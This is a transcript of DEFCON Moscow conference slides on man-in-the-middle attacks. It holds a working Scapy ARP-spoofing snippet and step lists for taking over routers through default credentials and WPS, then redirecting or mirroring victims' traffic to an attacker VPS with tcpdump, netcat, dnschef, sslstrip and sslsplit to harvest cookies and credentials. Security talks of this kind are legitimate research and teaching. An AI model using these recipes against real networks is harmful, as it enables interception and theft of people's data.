$30 off During Our Annual Pro Sale. View Details »

Oleg Kupreev - Uncommon MiTM in uncommon conditions

DC7499
October 03, 2015

Oleg Kupreev - Uncommon MiTM in uncommon conditions

DEFCON Moscow 10

DC7499

October 03, 2015
Tweet

More Decks by DC7499

Other Decks in Research

Transcript

  1. None
  2. Uncommon MiTM in uncommon conditions

  3. 00 WHOAMI • @090h, root@0x90.ru, keybase.io/090h • ZN HW Village

    organizer hardware@zeronights.ru • 802.11 pwner, SDR/RF enthusiast • embedded reverser (for PWN/DIY) • JBFC/DC7499 member • researcher at hlsec.ru • pwning telecommunications since 2002 • …was doing MITM 20 years ago 8)
  4. 01 INTRO • XXI century is communications century • When

    I was a boy we counted in Pentiums 8) 1993 Pentium 66Mhz – 2000 Pentium 4 1400MHz • Nowadays we count in G and still use Pentium, but 4G is used and 5G in progress • DialUp 9600 FIDO – FTTH 100Mb Internet • Nearest future: 5G + IPv6 + IoE • Security of communications evolving slooooooooooowly. SS7 invented in 1975, kicking ass nowadays
  5. 02 MAN MITM • MITM = Man In The Middle

    • It is a type fundamental communication attacks • Subtypes: active, passive • IRL: passive MITM = sniff, active MITM = MITM • Also has a name….
  6. None
  7. None
  8. Alice, Bob and Eve…

  9. .. and sometimes Charlie

  10. .. and Mallory aka Trudy

  11. Implementation • Fundamental => data channel independent • Data channels:

    • Ethernet • USB • UART • SPI • RFID • NFC • WiFi • GSM
  12. ETHERNET EVE

  13. MY FIRST SNIFFER EVE

  14. ALICE LOOKED AWSOME THEESE DAYS

  15. NFC EVE

  16. Short summary • Technology changes – MiTM changes. Hackers should

    be adaptive. • Security of telecommunications is like in 90’s • MiTM world is much more bigger than most hacker think • Study fundamental sciences, to be able to hack at FUNdaMENTAL layer!
  17. I LIKE TO MITM IT MITM IT

  18. MITM I HAVE KNOWN AND LOVED • LAN based MITM

    • WAN based MITM • Rogue AP MITM (KAMA/MANA/HostapdWPE) • MITM over VPN (L2TP, PPTP) • Hybrid MITM
  19. MITM anatomy • ARP/DHCP/IPv6/RogueAP/SOME_ATTACK to become MALLORY • PLAiN_TEXT_PROTO =>

    SNIFF FOR LOOT + INJECT EViL • HTTP + BEEF hook.js => MITB = MAN_IN_THE_BROWSER • HTTP + BDFProxy => SHELLZ • SSL + PROTO => (SSLSPLIT || SSLSTRiP) => PROTO • SSL + PROTO => (HEARTBLEED || POODLE) => PWN • LOOT => cookies, credentials, photos, locations • Custom sniffers/injectors/sploits for protocols/apps/vulns • Example: SMB/NTLM relays
  20. THAT’S WHY PRACTICS RULE!

  21. Cooking MITM by ARP cache poison attack

  22. Practice with Scapy

  23. ARP attacks send( Ether(dst=clientMAC)/ARP(op="who-has", psrc=gateway, pdst=client), inter=RandNum(10,40), loop=1 ) #

    half duplex send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2) /ARP(op="who-has", psrc=gateway, pdst=client), inter=RandNum(10,40), loop=1 ) # ARP spoofing in VLANS
  24. Meanwhile in real world

  25. Common MITM after ARP poison

  26. IRL: WTF IS GOING ON?

  27. SOME ATTACK? MAYBE PWN THE ROUTER?

  28. PixieWPS + admin:admin @ web interface

  29. Shodan + device-pharmer.py pwnage

  30. We’ve got root! What to do next? • Backup configuration

    • Get shell • Research firmware availabilities • Have fun
  31. Backup configuration

  32. Enable telnet access

  33. Enable DynDNS if white IP

  34. Enable syslog to rsyslogd @ VPS

  35. Use Guest WiFi as tiny KARMA

  36. Separate SSID, IP mask = comfort

  37. Install plugins

  38. Enable PPTP VPN

  39. Install and use tcpdump in firmware

  40. BPF 4 YOU

  41. Set DNS to your EvilDNS with dnschef

  42. Passive MITM aka EVE at router • tcpdump • NFS

    mount and/or netcat • Write pcap file to share/pipe with tcpdump
  43. Eve on router

  44. Mallory on router • Set DNS to VPS • Install

    tcpdump, sslsplit, sslstrip • NFS mount/netcat • Write pcap file to share/pipe with tcpdump
  45. Mallory on router

  46. Pros and cons Pros: • Not so hard to do

    Cons • Router is rebooted by watchdog or users • MITM is sloooooooooow cause of high temp of CPU • Not so many routers have such reach features • VPS IP disclosure during MITM
  47. WAN MITM TO VPS

  48. WAN MITM ALGO • Telnet to router • Run mitmproxy

    in transparent mode on VPS • DNAT port 80 to VPS_IP:8080
  49. Router requirements • telnet/ssh/rce/cmd inj • iptables

  50. WAN based MITM

  51. Pros and cons Pros: • Not so hard to do

    Cons • Oworks for HTTP traffic • Can’t distinguish clients by ip • VPS IP disclosure during MITM
  52. HARDCORE MODE ON PPTP based MITM

  53. PPTP MITM ideas • MiTM contains of 2 parts for

    router and VPS • All active attacks are working on VPS • Router is used for forwarding and routing • pwner is pwning
  54. Router requirements • PPTP VPN server in firmware • iptables

    • telnet/ssh/rce/cmd inj
  55. VPS requirements • Linux, • pptp • iptables • sslstrip,sslsplit,

    tcpdump, mitmproxy
  56. PPTP MITM ALGO • Connect from VPS to PPTP VPN

    • Get ppp0 interface IP • Launch MITM kit on ppp0 (sslsplit, sslstrip, iptavleforwarding) • Telnet to router • Add ISP gateway to route map • Set VPS ppp0 IP as default gateway • PWN’em all
  57. PPTP Server on router + Mallory on VPS

  58. Pros and cons Pros: • FULL MITM • No IP

    disclosure Cons • Router looses connection to Internet if PPTP connection is down
  59. REPOS/TOOLS REPOS • https://github.com/0x90/lan-warz • https://github.com/0x90/mitm-arsenal • https://github.com/0x90/scapy-arsenal MiTM EXAMPLES

    https://github.com/dc7499/uncommon-mitm